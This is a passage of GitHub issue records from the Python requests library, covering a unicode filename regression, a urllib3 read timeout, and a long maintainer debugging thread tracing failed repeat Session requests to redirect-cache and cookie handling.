After merge of https://github.com/kennethreitz/requests/pull/2379, to allow filenames to be `int` types, unicode filenames are no longer recognized under Python 2. This checks that the filename is a `builtin` `str`, which has different behaviour on Python 2 and Python 3: `requests/utils.py:118: if name and isinstance(name, builtin_str) and name[0] != '<' and name[-1] != '>':` In `requests/compat.py`, `builtin_str` is defines as `str`, which is non-unicode `bytes` in Python 2 and unicode in Python 3. Perhaps the check should be against basestring, or is this change in behaviour intended?
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2411/reactions" }
https://api.github.com/repos/psf/requests/issues/2411/timeline
null
completed
null
null
false
[ "In fact, I have not tried this yet, but I think it will make writing code compatible with Python 2 and Python 3 much more difficult. In working around the Python 2 issue by encoding the unicode filename, it is likely that a Python 3 issue will be introduced. This is going to require version specific encoding handling to ensure a unicode filename under Python 3 and a non-unicode filename under Python 2.\n", "@sjagoe I have a question: if you provide us a unicode filename, what encoding should we render that with when transmitting that over the wire?\n", "@Lukasa Admittedly, that is an issue. There is no way for you to know. I guess in the past is just encoded to `ascii`?\n\nIn which case, this issue is still two things: \n- v2.5.1 broke compatibility with v2.5.0.\n- I have just verified that under Python 3, if the filename _is_ encoded beforehand, then the original issue I reported under Python 2 rears its head. That is, requests does not send the filename and my server sees the filename simply as `'file'`, instead of the original.\n\nEDIT: To clarify, under Python 3, a Unicode filename is _required_ (any encoded filename, e.g. `ascii`, `utf-8`, etc, is not sent to the server) and under Python 2, and encoded filename is _required_.\n", "Agreed.\n\nWhat we need, I think, is for `guess_filename` to check on `basestring` and then call `to_native_str`.\n", "I would even be okay with it if a unicode filename was rejected outright with an exception, requiring the user to explicitly encode, but I don't know what the policy of requests is wrt user-annoying strictness ;-)\n", "Of course, in the interest of compatibility, using `to_native_str` for any 2.5.x fixes would be the best way forward in any case.\n", "So the reality is that we need to unbreak this until 3.0 at which point we can redefine the requests interface for this. 
I have an idea for a solution and am working on a pull request.\n", "I'm seeing this issue now in 2.6.0 with the following code:\n\n``` python\nurl = 'https://slack.com/api/files.upload'\nwith open('File β.txt', 'rb') as file:\n r = requests.post(url, files={'file': file}, params={\n 'token': api_token,\n 'channels': channel\n })\n```\n\nI get a response that no data was found. I'm using Python 3.\n", "@abbeycode Can you run the following snippet for me please?\n\n``` python\nfrom requests.utils import guess_filename\n\nwith open('File β.txt', 'rb') as file:\n print guess_filename(file)\n print type(guess_filename(file))\n\n```\n", "Luckily Slack is very responsive about these sorts of things and you should kindly inform them that they're not following 10+ year old specifications and they should (namely RFC 2231). I suspect this is more of a duplicate of #2117 than this issue.\n", "Yeah, suspect you're right @sigmavirus24. Note that this is a fairly widely-deployed standard, and the HTTPBis is working on bringing it up to date in the draft for [RFC 5987bis](https://tools.ietf.org/html/draft-reschke-rfc5987bis-07), so servers and frameworks that don't support it really should.\n", "@Lukasa it seems that 5987bis is expired =( (Expires Jan 3, 2015)\n", "Work is still ongoing, WG is aiming for last call by IETF Prague.\n", "@Lukasa this is what I get:\n\n```\nFile β.txt\n<class 'str'>\n```\n", "Yup, so this means your server doesn't support the RFC that's used to automatically encode binary data. 
I recommend you encode the name of your file before opening it, or provide the filename yourself:\n\n``` python\nurl = 'https://slack.com/api/files.upload'\nwith open('File β.txt', 'rb') as file:\n r = requests.post(url, files={'file': ['File β.txt'.encode('utf-8'), file]}, params={\n 'token': api_token,\n 'channels': channel\n })\n```\n", "@Lukasa thanks for all the help, but I'm getting this:\n\n> TypeError: Type str doesn't support the buffer API\n\non this line:\n\n```\nif not any(ch in value for ch in '\"\\\\\\r\\n'):\n```\n\nin `urllib3/fields.py` (line 34). This seems like a Python 3 issue, perhaps?\n", "Hm. Let me look at that\n", "Oh wait, you mean from using @Lukasa's example using encode? Yeah. I think you're better bet is to annoy Slack until it works. I'll have to look into your existing problem first though.\n", "I sent Slack an email describing what's happening, so hopefully they'll respond and fix the issues. Thanks @Lukasa and @sigmavirus24 for all the help!\n" ]
https://api.github.com/repos/psf/requests/issues/2410
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2410/labels{/name}
https://api.github.com/repos/psf/requests/issues/2410/comments
https://api.github.com/repos/psf/requests/issues/2410/events
https://github.com/psf/requests/issues/2410
54,652,674
MDU6SXNzdWU1NDY1MjY3NA==
2,410
urllib3 exceptions
{ "avatar_url": "https://avatars.githubusercontent.com/u/80876?v=4", "events_url": "https://api.github.com/users/edrahn/events{/privacy}", "followers_url": "https://api.github.com/users/edrahn/followers", "following_url": "https://api.github.com/users/edrahn/following{/other_user}", "gists_url": "https://api.github.com/users/edrahn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/edrahn", "id": 80876, "login": "edrahn", "node_id": "MDQ6VXNlcjgwODc2", "organizations_url": "https://api.github.com/users/edrahn/orgs", "received_events_url": "https://api.github.com/users/edrahn/received_events", "repos_url": "https://api.github.com/users/edrahn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/edrahn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/edrahn/subscriptions", "type": "User", "url": "https://api.github.com/users/edrahn", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-17T06:26:33Z
2021-09-08T23:06:11Z
2015-01-17T14:42:51Z
NONE
resolved
Traceback (most recent call last): File "./dlcharts.py", line 111, in <module> content = get_url(url) File "/home/ed/projects/equalog/src/web.py", line 118, in get_url referrer=referrer) File "/home/ed/projects/equalog/src/web.py", line 81, in get_content content = response.content File "/usr/lib/python2.7/dist-packages/requests/models.py", line 694, in content self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes() File "/usr/lib/python2.7/dist-packages/requests/models.py", line 627, in generate for chunk in self.raw.stream(chunk_size, decode_content=True): File "/usr/lib/python2.7/dist-packages/urllib3/response.py", line 242, in stream data = self.read(amt=amt, decode_content=decode_content) File "/usr/lib/python2.7/dist-packages/urllib3/response.py", line 200, in read raise ReadTimeoutError(self._pool, None, 'Read timed out.') urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='....', port=80): Read timed out.
{ "avatar_url": "https://avatars.githubusercontent.com/u/80876?v=4", "events_url": "https://api.github.com/users/edrahn/events{/privacy}", "followers_url": "https://api.github.com/users/edrahn/followers", "following_url": "https://api.github.com/users/edrahn/following{/other_user}", "gists_url": "https://api.github.com/users/edrahn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/edrahn", "id": 80876, "login": "edrahn", "node_id": "MDQ6VXNlcjgwODc2", "organizations_url": "https://api.github.com/users/edrahn/orgs", "received_events_url": "https://api.github.com/users/edrahn/received_events", "repos_url": "https://api.github.com/users/edrahn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/edrahn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/edrahn/subscriptions", "type": "User", "url": "https://api.github.com/users/edrahn", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2410/reactions" }
https://api.github.com/repos/psf/requests/issues/2410/timeline
null
completed
null
null
false
[ "What version of requests are you using? This should have been patched in 2.4.0.\n", "I'm not sure what version it was. I was using the system package instead of my virtaulenv one, and that fixed it. Most likey diferent versions.\n" ]
https://api.github.com/repos/psf/requests/issues/2409
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2409/labels{/name}
https://api.github.com/repos/psf/requests/issues/2409/comments
https://api.github.com/repos/psf/requests/issues/2409/events
https://github.com/psf/requests/issues/2409
54,500,918
MDU6SXNzdWU1NDUwMDkxOA==
2,409
Consecutive requests with Session() raises 404
{ "avatar_url": "https://avatars.githubusercontent.com/u/1877650?v=4", "events_url": "https://api.github.com/users/RossLote/events{/privacy}", "followers_url": "https://api.github.com/users/RossLote/followers", "following_url": "https://api.github.com/users/RossLote/following{/other_user}", "gists_url": "https://api.github.com/users/RossLote/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/RossLote", "id": 1877650, "login": "RossLote", "node_id": "MDQ6VXNlcjE4Nzc2NTA=", "organizations_url": "https://api.github.com/users/RossLote/orgs", "received_events_url": "https://api.github.com/users/RossLote/received_events", "repos_url": "https://api.github.com/users/RossLote/repos", "site_admin": false, "starred_url": "https://api.github.com/users/RossLote/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/RossLote/subscriptions", "type": "User", "url": "https://api.github.com/users/RossLote", "user_view_type": "public" }
[]
closed
true
null
[]
null
42
2015-01-15T20:38:19Z
2021-09-08T01:21:19Z
2018-06-19T18:23:11Z
NONE
resolved
In [1]: import requests In [2]: s = requests.Session() In [3]: s.get('https://www.flavourly.com/start-subscription/12/', verify=False) Out[3]: <Response [200]> In [4]: s.get('https://www.flavourly.com/start-subscription/12/', verify=False) Out[4]: <Response [404]> Is it me or is this a bug? I've checked and it only happens in versions higher than 2.3.0.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2409/reactions" }
https://api.github.com/repos/psf/requests/issues/2409/timeline
null
completed
null
null
false
[ "I don't think it's a bug, I think it's because of cookies. Flavourly doesn't seem to like the cookies we're sending back. Try checking the difference between the value of `s.cookies` after the first request, once in something where you don't see the 'bug', and once in a version where you do.\n", "In fact, I think the bug is on Flavourly's end, because the history is this:\n\n``` python\n>>> import requests\n>>> s = requests.Session()\n>>> r1 = s.get('https://www.flavourly.com/start-subscription/12/')\n>>> r1.history\n[<Response [302]>, <Response [301]>]\n>>> for r in r1.history:\n... print r.url\n... \nhttps://www.flavourly.com/start-subscription/12/\nhttp://www.flavourly.com/signup/\n>>> print r.url\nhttp://www.flavourly.com/signup/\n```\n", "But the second time around, they 404 on the signup URL:\n\n``` python\n>>> r2 = s.get('https://www.flavourly.com/start-subscription/12/')\n>>> for r in r2.history:\n... print r.url\n... \nhttps://www.flavourly.com/start-subscription/12/\n>>> print r2.url\nhttps://www.flavourly.com/signup/\n```\n", "Oh, hey, look! For the second time my predictions about #2095 have come true and it's caused us problems:\n\n```\nimport requests\n>>> s = requests.Session()\n>>> class NullDict(dict):\n... def __setitem__(self, key, value):\n... return\n... \n>>> s.redirect_cache = NullDict()\n>>> s.get('https://www.flavourly.com/start-subscription/12/')\n<Response [200]>\n>>> s.get('https://www.flavourly.com/start-subscription/12/')\n<Response [200]>\n```\n", "So I retract my position, this is an interaction of a requests behaviour and a Flavourly behaviour. They 301 from http to https, which we cache. We're allowed to do that, that's what 301 means, as you can see [from the spec](https://tools.ietf.org/html/rfc7231#section-6.4.2):\n\n> The 301 (Moved Permanently) status code indicates that the target resource has been assigned a new permanent URI and any future references to this resource ought to use one of the enclosed URIs. 
Clients with link-editing capabilities ought to automatically re-link references to the effective request URI to one or more of the new references sent by the server, where possible.\n\nHowever, that seems to fall over with this particular redirect. That's weird because the 301 doesn't actually set any cookies or anything, and we don't send it any cookies either (because they stored their cookie as 'secure').\n", "Ok, the problem is cookie handling. This request came from one with the redirect cache turned off:\n\n``` python\n>>> r.request.headers['Cookie']\n'csrftoken=83Tg47VB3OtXBLsIQa3PZg5NEJFH5dhT; sessionid=j59ad65zb2lzfviux37kwxqjipytqthr'\n```\n\nAnd this one from one with the redirect cache turned on:\n\n``` python\n>>> r2.request.headers['Cookie']\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/usr/local/lib/python2.7/site-packages/requests/structures.py\", line 54, in __getitem__\n return self._store[key.lower()][1]\nKeyError: 'cookie'\n```\n\nHere are the two session cookiejars:\n\n``` python\n>>> s.cookies\n<RequestsCookieJar[Cookie(version=0, name='csrftoken', value='83Tg47VB3OtXBLsIQa3PZg5NEJFH5dhT', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1452805132, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), Cookie(version=0, name='sessionid', value='j59ad65zb2lzfviux37kwxqjipytqthr', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1422565132, discard=False, comment=None, comment_url=None, rest={'httponly': None}, rfc2109=False)]>\n>>> s2.cookies\n<RequestsCookieJar[Cookie(version=0, name='csrftoken', value='Pja7YWnMlcw4qtrvvf2I6BbeuV3S6iGX', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', 
path_specified=True, secure=True, expires=1452805188, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), Cookie(version=0, name='sessionid', value='222eih12j1h8wr3c3n93pvza8hkg736e', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1422565189, discard=False, comment=None, comment_url=None, rest={'httponly': None}, rfc2109=False)]>\n```\n", "Ugh, FFS, I've found it.\n\nThe problem is that we handle the redirect cache in `Session.send` with this logic:\n\n``` python\n checked_urls = set()\n while request.url in self.redirect_cache:\n checked_urls.add(request.url)\n new_url = self.redirect_cache.get(request.url)\n if new_url in checked_urls:\n break\n request.url = new_url\n```\n\nHowever, this is well _after_ we've decided what the cookies should be (in `Session.prepare_request`). This means that the cookies are chosen based on the original URL, but the actual URL hit is potentially redirected dramatically.\n\nThis is a definite bug introduced by #2095. Apologies for my earlier comment @RossLote, you're quite right that this is a bug.\n", "@RossLote Until this gets fixed, feel free to use the workaround I posted above. It has no negative side-effects aside from occasionally slightly slowing your code down.\n", "Alright, @sigmavirus24, I've thought about this overnight and I can't think of a good fix that uses the current code and doesn't commit wild layering violations. So here's my proposal.\n\nWe should rewrite the redirect cache.\n\nThe core problem is, fundamentally, that the redirect cache's implementation is misguided. I've come to this position because of closer reading of RFC 7231. It has the following two stanzas [under the 301 code](https://tools.ietf.org/html/rfc7231#section-6.4.2) that I find to be interesting:\n\n> [A]ny future references to this resource ought to use one of the enclosed URIs. 
Clients with link-editing capabilities ought to automatically re-link references to the effective request URI to one or more of the new references sent by the server, where possible\n\nand\n\n> A 301 response is cacheable by default; i.e., unless otherwise indicated by the method definition or explicit cache controls.\n\nThis is a weird combination of text. If the 301 is supposed to cause a rewrite of the URL, why would I cache it?\n\nMy suspicion is that the correct flow in requests is actually not a 'redirect' cache, but a 301 cache, that literally returns 301 responses without contacting the network. This will lead to the correct flow in requests: everything looks exactly the same from the perspective of the upper layers of code, the response just came in really fast.\n\nThis is backed up by examining what Chrome does, which is serve 301s from its cache (click to see better):\n\n![301](https://cloud.githubusercontent.com/assets/1382556/5773563/dc5f2bdc-9d5b-11e4-8581-5f83e76d8526.png)\n\nI think now, as I thought then, that the 301 cache should not have been merged in its proposed form. I now think more strongly than that: we have to change it. I have three options on the table:\n1. Remove the redirect cache entirely. People who want that function should use [CacheControl](https://github.com/ionrock/cachecontrol), as we have said many, many times. This will lead to the flow through requests I mentioned above, resolve this bug (and some others that are inevitably lying around), and provide additional benefits _on top_ of the standard redirect cache.\n2. Replace the redirect cache with a special-case cache for 301s that operates at the `HTTPAdapter` layer. This is tricky, because caching 301s needs to obey all the rules for caching (another thing our 'redirect cache' doesn't do), including `Cache-Control` and `Vary` headers. We'd probably need to write about 30% of the CacheControl library, which raises my third option;\n3. 
Bring CacheControl (or someone else) into the fold. Bless a requests caching solution as 'the one true way' to cache and bring it in tree, or use it as an external `pip` dependency, but include it by default. This will fix our 301 bugs and give us caching out-of-the-box by default.\n\nThoughts would be extremely appreciated at this time. Especially from @sigmavirus24, @kennethreitz, @shazow, @ionrock. Note also the discussion that occurred in #2095: my reading of it suggests that @johnsheehan, @dstufft, and @dknecht favoured my option 1, and @dolph favoured something closer to my option 3 (or possibly 2).\n", "Option 1 and 3 seem the most reasonable to me. I agree with your reading of the spec. The redirect cache is really an operation that is implicitly dependent on the client having some caching implementation including both storage and the HTTP algorithms. Unfortunately, as I have a feeling that I assumed requests was responsible for it, I don't have support for caching 301s in CacheControl. That should obviously change before recommending CacheControl handle this aspect. \n\nAlso, to specifically address option 3, I'm fine to merge or include CacheControl as a dependency. I'm happy to support the code no matter the decision there. Between to the two, I suspect that adding a dependency would be the better option, but in terms my stamp of approval, I'd support either option. Obviously, no big deal if option 3 doesn't happen either. In other words, I'm easy to please! :)\n", "I'm in favor of option 1. If there's a bunch of complexity to setting up CacheControl to handle this case (which is @Ionrock's prerogative) we can put the common code in requests-toolbelt as necessary. I'm fine having a dependency in there on CacheControl. If we do choose option 3, I'd much rather see CacheControl as an outside dependency. 
Development on that moves quickly enough that it makes sense to allow people to upgrade as necessary rather than bundling it.\n\nFrankly, I'm worried about removing the redirect cache haphazardly though. Perhaps the best first option would be to use a `NullCache` for v2.6.0 of requests. This means people will have to specifically turn it on for it to work (and thereby cause issues). We would document how to use `urllib3`'s `RecentlyUsedContainer`. I suspect the problem we'll have is with pickling again. We can serialize a `NullCache` as a special sentinel value. Then we'll have to change https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L674 to check the popped value and determine if it's the sentinel. If it isn't, we'll use a `RecentlyUsedContainer`.\n\nIt's extra work but it will provide a level of backwards compatibility until we can break this out in 3.0. In documenting how to enable this, we should add the warning that it is a slipshod implementation of the cache that has been known to cause problems. It should also be noted that it is considered deprecated functionality and will be removed in 3.0. When it's available in CacheControl, we should then start pointing towards that as a real solution that is correct and more reliable than using the redirect cache.\n\nHow does this sound to everyone?\n", "I've updated CacheControl to support 301 and 300 status codes. 300s are dealt with, more or less, like a normal response, where 301s are cached by default, while adhering to caching headers. \n\nI looked into the other 3xx headers and it seems the spec specifically provides guidance regarding caching by mentioning it specifically in its description. If others have different perspectives let me know. \n\nIf folks want to test it out to verify it fufills the same results as the existing redirect cache, just checkout master and give it a try. Let me know if you find any issues. 
\n", "I'm having a similar problem as the original report here. In my case the subsequent requests are returning a 400 rather than 404.\n\n```\n$ python\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> auth\n('xxxxx', 'xxxxxx')\n>>> s = requests.session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n```\n\nSubsequent requests are OK when not using a session:\n\n```\n>>> r = requests.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = requests.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>>\n```\n\nAnd it works OK when using a session without the auth:\n\n```\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/changes/\")\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/changes/\")\n>>> r\n<Response [200]>\n>>>\n```\n\nI've tried the `NullDict` workaround mentioned above, but that didn't make any difference.\n", "@dpursehouse What's in the response history for each response?\n", "@Lukasa the history seems to be empty for both responses\n\n```\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r.history\n[]\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n>>> r.history\n[]\n>>> \n```\n", "I've also tried using the latest head of the master branch (previously using the released 2.7.0) and get the same results.\n", "@dpursehouse That strongly suggests one of two things:\n1. The connection is setting a cookie that it then does not expect to receive back. Unlikely.\n2. The remote server doesn't like connection reuse. _Way_ more likely. 
Particularly if it's behind HAProxy, which can get all kinds of sad here.\n\nCan you try mounting a HTTPAdapter with a poolsize of 1?\n\n``` python\nfrom requests.adapters import HTTPAdapter\nimport requests\n\nh = HTTPAdapter(pool_connections=1, pool_maxsize=1)\ns = requests.Session()\ns.mount('https://gerrit-review.googlesource.com', h)\n\n# Make your requests here\n```\n", "Same result :(\n\n```\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n>>> \n```\n", "Ah, crap, sorry, change the 1s to 0s. Sometimes I forget how to urllib3. =D\n", "After changing them to 0 I get this exception on the `get` call:\n\n```\nrequests.packages.urllib3.exceptions.ClosedPoolError: HTTPSConnectionPool(host='gerrit-review.googlesource.com', port=443): Pool is closed.\n```\n", "BTW in case it's relevant, on the call to `get` that succeeds, it emits this:\n\n```\nENV/local/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. 
For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n```\n\nThe subsequent failing one does not.\n\nI omitted that from my previous logs because I was too lazy to edit out only the sensitive parts of my path and just removed the whole line.\n", "That's to be expected: we only emit the InsecurePlatformWarning once.\n\nOk, new plan: can we do this instead?\n\n``` python\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n```\n\nHere we're trying not to consume the response, which should ensure the pool is empty and you get a new connection.\n", "This time it emits the `InsecurePlatformWarning` on both requests, but the second request still returns 400.\n\n```\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. 
For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>>\n```\n", "Interesting. That suggests a cookie problem. Can you print `r.request.headers` for me in both cases?\n", "Looks like there's a cookie in the second one that wasn't in the first. Note that I've redacted the value of the cookie and the auth headers :)\n\n```\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. 
For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r.request.headers\n{'Accept': '*/*', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Authorization': 'Basic xxxx', 'User-Agent': 'python-requests/2.7.0 CPython/2.7.6 Darwin/14.1.0'}\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>> r.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.7.0 CPython/2.7.6 Darwin/14.1.0', 'Connection': 'keep-alive', 'Cookie': 'gi=xxxx', 'Authorization': 'Basic xxxx'}\n>>>\n```\n", "So that cookie appears to be the core problem. Can you confirm that the header was correctly set? `r.headers['set-cookie']` will work. Can you obfuscate the value and then show me the rest?\n", "The `set-cookie` header is present on the response from the first request, but not on the second.\n\n```\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. 
This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r.headers['set-cookie']\n'gi=xxx;Path=/;Secure;HttpOnly'\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>> r.headers['set-cookie']\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/structures.py\", line 54, in __getitem__\n return self._store[key.lower()][1]\nKeyError: 'set-cookie'\n>>>\n```\n", "That's bizarre. Why does the service not like the cookie that it itself sets?\n\nLet's just confirm that this is actually what's happening. Can you run this?\n\n``` python\nimport requests\nfrom requests.cookies import RequestsCookieJar\nurl = \"https://gerrit-review.googlesource.com\"\nauth = requests.utils.get_netrc_auth(url)\ns = requests.Session()\nr = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\nprint r.status\ns.cookies = RequestsCookieJar()\nr = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\nprint r.status\n```\n", "Had to change `r.status` to `r.status_code`, but it seems 